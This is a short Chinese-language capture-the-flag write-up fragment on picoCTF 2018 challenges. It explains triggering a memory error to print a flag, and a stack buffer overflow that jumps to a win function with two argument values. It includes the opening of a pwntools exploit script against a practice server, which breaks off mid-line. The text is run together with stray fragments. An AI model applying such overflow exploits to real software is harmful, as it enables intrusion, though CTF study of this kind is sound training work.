思路 ssh连接后发现一个vlun的程序 结合IDA反编译结果signal函数,当对内存错误读写时,printflag arg[1]直接在程序后边写,得到flag EXP image.png
r.interactive() picoctf_2018_buffer overflow 2 在vuln函数中存在栈溢出,使其溢出跳转到win函数,并传入两个参数0xDEADBEEF和0xDEADC0DE frompwnimport*r=remote('node3.buuoj.cn',26189)#r=process('./PicoCTF_2018_buffer_overflow_2')elf=ELF('./PicoCTF_2018_buffer_overflow_2') win_addr=elf.symbols...